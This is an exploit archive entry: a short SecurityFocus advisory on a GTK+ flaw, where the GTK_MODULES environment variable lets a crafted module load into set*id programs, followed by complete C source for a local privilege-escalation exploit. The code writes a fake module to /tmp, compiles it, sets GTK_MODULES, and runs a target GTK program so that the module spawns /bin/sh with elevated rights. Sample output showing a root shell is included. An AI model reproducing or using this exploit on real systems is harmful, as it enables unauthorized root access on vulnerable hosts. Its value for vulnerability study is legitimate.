// source: https://www.securityfocus.com/bid/2165/info
GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a user elevated privileges.
The problem occurs in the ability to load modules with the GTK_MODULES environment variable. It is possible to specify a path to modules that may not be part of the GTK+ package using this environment variable. By doing so, a custom crafted module can be loaded by the toolkit. Once loaded by the toolkit, the module is executed. This issue makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code.
/* (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. this will give
you the euid/egid of a set*id program using gtk+. this exploit works via
the GTK_MODULES environmental variable, by tricking gtk to execute arbitrary
functions/commands with a bogus module. (using gtk_module_init())
example(./xgtk):
-------------------------------------------------------------------------------
# ls -l /usr/bin/X11/gtk_program
-rwxr-sr-x 1 root tty 437625 Oct 23 1999 /usr/bin/X11/gtk_program
# cc xgtk.c -o xgtk
# ./xgtk /usr/bin/X11/gtk_program :0.0
[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]
[ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ]
[*] making module for gtk+ to execute. (/tmp/gtkm.c)
[*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so)
[*] done, checking to see if the module comiled. (/tmp/gtkm.so)
[*] done, setting up the environment. (module&display)
[*] done, executing /usr/bin/X11/gtk_program, the module should load now.
[*] success, module loaded successfully.
[*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
[*] now executing: /bin/sh.
#
-------------------------------------------------------------------------------
note: this will require a valid display to exploit successfully. also, i'm
unsure of this for other gtk versions, i would just assume as much
that this applies to it.
*/
#define GCCPATH "/usr/bin/gcc" // path to gcc.
#define SRCFILE "/tmp/gtkm.c" // source to the fake module to load.
#define MODEXEC "/tmp/gtkm.so" // fake module to load.
#define DISPLAY ":0.0" // default display. (also argv option)
#define EXECUTE "/bin/sh" // execute this program.
#include <stdio.h>
#include <sys/stat.h>
int main(int argc,char **argv){
char cmd[256],syscmd[256],display[256];
struct stat mod1,mod2,mod3;
FILE *source;
fprintf(stderr,"[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]"
"\n");
if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));}
else{
fprintf(stderr,"[!] syntax: %s </path/to/program> [display]\n",argv[0]);
exit(-1);
}
if(argc>2){strncpy(display,argv[2],sizeof(display));}
else{strncpy(display,DISPLAY,sizeof(display));}
if(stat(cmd,&mod1)){
fprintf(stderr,"[!] failed, %s doesn't seem to exist. (path needed)\n",cmd);
exit(-1);
}
if(stat(GCCPATH,&mod2)){
fprintf(stderr,"[!] failed, %s compiler doesn't seem to exist.\n",GCCPATH);
exit(-1);
}
fprintf(stderr,"[ program: %s(->%s), display: %s. ]\n\n",cmd,EXECUTE,display);
fprintf(stderr,"[*] making module for gtk+ to execute. (%s)\n",SRCFILE);
unlink(SRCFILE);
unlink(MODEXEC);
source=fopen(SRCFILE,"w");
fprintf(source,"#include <stdio.h>\n");
fprintf(source,"void gtk_module_init(){\n");
fprintf(source," unlink(\"%s\");\n",SRCFILE);
fprintf(source," unlink(\"%s\");\n",MODEXEC);
fprintf(source," fprintf(stderr,\"[*] success, module loaded successfully.\\n"
"\");\n");
fprintf(source," fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d"
", egid: %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n",EXECUTE);
fprintf(source," fprintf(stderr,\"[*] now executing: %s.\\n\");\n",EXECUTE);
fprintf(source," execl(\"%s\",\"%s\",0);\n",EXECUTE,EXECUTE);
fprintf(source,"}\n");
fclose(source);
fprintf(stderr,"[*] done, compiling module source file. (%s->%s)\n",SRCFILE,
MODEXEC);
snprintf(syscmd,sizeof(syscmd),"%s -shared -o %s %s 1>/dev/null 2>&1",GCCPATH,
MODEXEC,SRCFILE);
system(syscmd);
fprintf(stderr,"[*] done, checking to see if the module comiled. (%s)\n",
MODEXEC);
if(stat(MODEXEC,&mod3)){
fprintf(stderr,"[!] failed, %s was not compiled properly. (gcc failed)\n",
MODEXEC);
exit(-1);
}
fprintf(stderr,"[*] done, setting up the environment. (module&display)\n");
setenv("GTK_MODULES",MODEXEC,1);
setenv("DISPLAY",display,1);
fprintf(stderr,"[*] done, executing %s, the module should load now.\n",cmd);
if(execl(cmd,cmd,0)){
fprintf(stderr,"[!] failed, %s did not execute properly.\n",cmd);
unlink(SRCFILE);
unlink(MODEXEC);
exit(-1);
}
}